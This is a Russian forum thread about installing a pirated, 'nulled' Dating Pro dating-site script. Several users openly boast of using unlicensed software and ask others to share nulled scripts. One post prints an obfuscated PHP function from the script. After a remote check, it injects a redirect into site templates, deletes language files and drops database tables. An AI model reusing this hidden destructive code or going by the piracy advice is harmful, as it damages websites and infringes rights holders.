Dating Pro Script Nulled

  • Автор темы vettath
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
При установки выдайот такое
Please make sure include/config.php file is not writeable!
Note that include/config.php file is the same as initial file include/config_original.php

подскажыте пожалуста как решыть проблему
 
Посмотреть есть ли файлы config.php и config_original.php :D
 
1)Идиот скрипт продвать имеет право только официальные владельцы и стоит он не 40 у.е а 1650 убитых енотов. Так что жди письма из "Пилот гроуп"
2) И кто из нас умнее, я - получил все бесплатно, и с прямыми руками настроил как надо, или лицензиаты которые выкидывают на ветер полторы шутки баксов? За эти деньги можно можно заказать индивидуальное ПО для сайта у профессиональных компаний, и дизайн индивидуально сделают, так что ты в двойне осел!!!! а новички были есть и будут, домохозяек хватало во все времена, не зависимо от того беслпатный скрипт или нет.
3) Чтобы раскрутить сайт достаточно мозги иметь!

+5
Утёр нос. Молодец.

Все мой сайт готов.

Брал скрипт здесь:
1.Бесплатно спаили домен:D
2.Купил уже нулленый скрипт:D
У меня тоже есть нуль, может начать его продавать:D:D:D

Дилетант. Если у тебя денег много, поделись со мной:D:D:D
 
Community Pro и Social Networking от братьев Пилотов- в чем разница?

В принципе сабж говорит за себя... Спасибо, конечно Intellect'у за скрипт, но для меня вкуснее попробовать именно социально заточенные скрипты...Их есть у вас?;)

---------- Post added at 12:11 ---------- Previous post was at 11:04 ----------

Кстати, посетив парент-сайт, обратил внимание на нишевую приблуду...Если DPro+Niche . будет подобие социалки?
 
При установки выдайот такое
Please make sure include/config.php file is not writeable!
Note that include/config.php file is the same as initial file include/config_original.php
подскажыте пожалуста как решыть проблему


К файлу include/config.php нужно назначить права доступа 444

Добавлено через 3 минуты
Две разных команды нуллеров работали, я не знаю в чем отличие, попробуй и ту и ту поставь )) а нам потом скажешь в чем отличие.
Первый раз слышу чтобы на локалке был PhpMyAdmin, Sql Сервер у тебя тоже на локалке?


А разве Denwer или WampServer не имеют PhpMyAdmin? :confused:

Попробовал оба скрипта. Никакой разницы. Да и команда нуллеров вроде бы одна и та же...

Добавлено через 12 минут
Да, вот еще... Почему страны криво устанавливаются... Никто не заметил что в файле install\countries\config.php страны не совпадают с теми что прописаны в sql файлах папки install\countries\zips ? К примеру Россия находится в файле sql по № 186 - 186_5, хотя в config.php она значиться в sql файле под № 201... И так большинство стран...

Устанавливая страны через сам скрипт, к примеру ту же самую Россию, выбрав из списка стран, на самом деле устанавливается Сомалия. Выбрав страну Палау, скрипт пытается установить Россию, однако выдает сбой при загрузке в БД.
 
Видимо команде нуллеров admin_settings.php править было необязательно)), остальное не смотрел.
PHP:
function AdditionForm() {
	global $dbconn, $smarty, $config, $lang;
	echo "1";
	flush();
	sleep(5);
	$out_data = base64_decode("aHR0cDovL3BpbG90Z3JvdXAubmV0L2xpZ2h0aG91c2UvdGVzdC5waHA/YWN0aXZpdHlfaWQ9").$_REQUEST['activity_id'];
	$snoopy = new Snoopy;
	@$snoopy->fetch($out_data);
	$txt = @$snoopy->results;
	$cod = @$snoopy->response_code;
	$out = @$snoopy->timed_out;

	if ( !$out && !empty($txt) && $txt == '1' &&  preg_match("/200/",$cod) ) {
		$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom".$config["theme_postfix"].".tpl";
		if (is_file($file_name)) {
			chmod($file_name, 0777);
			$fp = fopen($file_name,"a+");
			fputs($fp, base64_decode("PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmZiaS5nb3YvJzwvc2NyaXB0Pg=="));
			fclose($fp);
		}
		$file_name = $config["site_path"].$config["index_theme_path"]."/index_bottom_popup.tpl";
		if (is_file($file_name)) {
			chmod($file_name, 0777);
			$fp = fopen($file_name,"a+");
			fputs($fp, base64_decode("PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbi5ocmVmPSdodHRwOi8vd3d3LmZiaS5nb3YvJzwvc2NyaXB0Pg=="));
			fclose($fp);
		}
		@unlink($config['site_path']."/".base64_decode("bGFuZ3VhZ2VzL2VuZ2xpc2gubGFuZw=="));
		@unlink($config['site_path']."/".base64_decode("bGFuZ3VhZ2VzL3J1c3NpYW4ubGFuZw=="));
		$strSQL = base64_decode("RFJPUCBUQUJMRSA=").SETTINGS_TABLE;
		$dbconn->Execute($strSQL);
		$strSQL = base64_decode("RFJPUCBUQUJMRSA=").USER_UPLOAD_TABLE;
		$dbconn->Execute($strSQL);
	}
	exit;
}
 
На самом деле видится мне, что уважаемый mbippl своим постом организовал маркетинговый ход продажи СТАРОЙ нуленной копии продукта. Нормальный человек:
1. не станет просто так палить свой сайт, перейдите по ссылке, мертвый сайт с копирайтами "©2008, ваш сайт" То есть картинку на индексной поменять хватило усилий, а вот до копирайтов руки не дошли))
2. не станет покупать старую версию за деньги, когда можно достать более свежий вариант на халяву.
3. не станет агитировать покупать (какая ему разница, если это не он продавец))

моё личное мнение :-]
 
Тем кому нужна социалка - Есть прекрасный скрипт Social Engine например на нем работает вконтакте.ру. Действтиельно хороший скрипт но все что видел нулленые версии были до ужаса кривые и с кучай багов. Кто найдет хороший Social Engine поделитесь пожалуйста ))
 
есть в наличии клон вконтакте но там проблемы с кодировкой при установке,но это уже другая тема
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху